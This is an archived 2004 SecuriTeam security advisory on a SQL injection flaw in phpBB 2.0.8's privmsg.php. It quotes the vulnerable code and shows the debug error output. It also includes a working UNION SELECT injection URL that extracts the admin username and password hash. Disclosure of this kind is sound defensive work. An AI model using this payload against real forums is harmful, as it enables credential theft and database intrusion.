[UNIX] phpBB SQL Injection Vulnerability (privmsg.php)

• Previous message: SecuriTeam: "[UNIX] Multiple Vulnerabilities in XMB Forum (CSS, SQL Injection, Administrative Password Disclosure)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 30 Mar 2004 13:15:35 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  phpBB SQL Injection Vulnerability (privmsg.php)
------------------------------------------------------------------------

SUMMARY

 <phpBB> phpBB is "a high powered, fully scalable, and highly customizable
open-source bulletin board package. phpBB has a user-friendly interface,
simple and straightforward administration panel, and helpful FAQ. Based on
the powerful PHP server language and your choice of MySQL, MS-SQL,
PostgreSQL or Access/ODBC database servers, phpBB is the ideal free
community solution for all web sites."

A new SQL injection vulnerability in privmsg.php was found. The bug allows
an attacker to gain sensitive information from the database.

DETAILS

Vulnerable Systems:
 * phpBB version 2.0.8 and older

Vulnerable Code:
*************************************************************************************

        // SQL to pull appropriate message, prevents nosey people
        // reading other peoples messages ... hopefully!
        //
        switch( $folder )
        {
                case 'inbox':
                        $l_box_name = $lang['Inbox'];
                        $pm_sql_user = "AND pm.privmsgs_to_userid = " .
$userdata['user_id'] . "
                                AND ( pm.privmsgs_type = " .
PRIVMSGS_READ_MAIL . "
                                        OR pm.privmsgs_type = " .
PRIVMSGS_NEW_MAIL . "
                                        OR pm.privmsgs_type = " .
PRIVMSGS_UNREAD_MAIL . " )";
                        break;
                case 'outbox':
                        $l_box_name = $lang['Outbox'];
                        $pm_sql_user = "AND pm.privmsgs_from_userid = " .
$userdata['user_id'] . "
                                AND ( pm.privmsgs_type = " .
PRIVMSGS_NEW_MAIL . "
                                        OR pm.privmsgs_type = " .
PRIVMSGS_UNREAD_MAIL . " ) ";
                        break;
                case 'sentbox':
                        $l_box_name = $lang['Sentbox'];
                        $pm_sql_user = "AND pm.privmsgs_from_userid = " .
$userdata['user_id'] . "
                                AND pm.privmsgs_type = " .
PRIVMSGS_SENT_MAIL;
                        break;
                case 'savebox':
                        $l_box_name = $lang['Savebox'];
                        $pm_sql_user .= "AND ( ( pm.privmsgs_to_userid = "
 $userdata['user_id'] . "
                                AND pm.privmsgs_type = " .
PRIVMSGS_SAVED_IN_MAIL . " )
                                OR ( pm.privmsgs_from_userid = " .
$userdata['user_id'] . "
                                        AND pm.privmsgs_type = " .
PRIVMSGS_SAVED_OUT_MAIL . " )
                                )";
                        break;
                default:
                        message_die(GENERAL_ERROR,
$lang['No_such_folder']);
                        break;
        }

        //
        // Major query obtains the message ...
        //
        $sql = "SELECT u.username AS username_1, u.user_id AS user_id_1,
u2.username AS username_2, u2.user_id AS user_id_2, u.user_sig_bbcode_uid,
u.user_posts, u.user_from, u.user_website, u.user_email, u.user_icq,
u.user_aim, u.user_yim, u.user_regdate, u.user_msnm, u.user_viewemail,
u.user_rank, u.user_sig, u.user_avatar, pm.*, pmt.privmsgs_bbcode_uid,
pmt.privmsgs_text
                FROM " . PRIVMSGS_TABLE . " pm, " . PRIVMSGS_TEXT_TABLE .
" pmt, " . USERS_TABLE . " u, " . USERS_TABLE . " u2
                WHERE pm.privmsgs_id = $privmsgs_id
                        AND pmt.privmsgs_text_id = pm.privmsgs_id
                        $pm_sql_user
                        AND u.user_id = pm.privmsgs_from_userid
                        AND u2.user_id = pm.privmsgs_to_userid";

*****************************************************************************

Take note of the $pm_sql_user variable. It is being concatenated
constantly throughout the code presented. Issuing the following:

http://localhost/phpbb206c/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=foobar

The error message received from the server is:

General Error

Could not query private message post information

DEBUG MODE

SQL Error : 1064 You have an error in your SQL syntax. Check the manual
that corresponds to your MySQL server version for the right syntax to use
near 'foobarAND ( ( pm.privmsgs_to_userid = 2 AND pm.privmsgs_t

SELECT u.username AS username_1, u.user_id AS user_id_1, u2.username AS
username_2, u2.user_id AS user_id_2, u.user_sig_bbcode_uid, u.user_posts,
u.user_from, u.user_website, u.user_email, u.user_icq, u.user_aim,
u.user_yim, u.user_regdate, u.user_msnm, u.user_viewemail, u.user_rank,
u.user_sig, u.user_avatar, pm.*, pmt.privmsgs_bbcode_uid,
pmt.privmsgs_text FROM phpbb_privmsgs pm, phpbb_privmsgs_text pmt,
phpbb_users u, phpbb_users u2 WHERE pm.privmsgs_id = 99 AND
pmt.privmsgs_text_id = pm.privmsgs_id foobarAND ( ( pm.privmsgs_to_userid
= 2 AND pm.privmsgs_type = 3 ) OR ( pm.privmsgs_from_userid = 2 AND
pm.privmsgs_type = 4 ) ) AND u.user_id = pm.privmsgs_from_userid AND
u2.user_id = pm.privmsgs_to_userid

Line: 238
File: D:\apache_wwwroot\phpbb206c\privmsg.php

If we repeat the query in the following manner:

http://localhost/phpbb206c/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND pm.privmsgs_type=-99 UNION SELECT null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null,null/

No error message is returned. A more realistic example would be:

http://localhost/phpbb206c/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND pm.privmsgs_type=-99 UNION SELECT username, null,user_password, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null,null FROM phpbb_users WHERE user_level=1 LIMIT 1/*

Which should present us with the admin's username and MD5 password hash.

ADDITIONAL INFORMATION

The information has been provided by <mailto:come2waraxe@yahoo.com> Janek
Vind.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[UNIX] Multiple Vulnerabilities in XMB Forum (CSS, SQL Injection, Administrative Password Disclosure)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]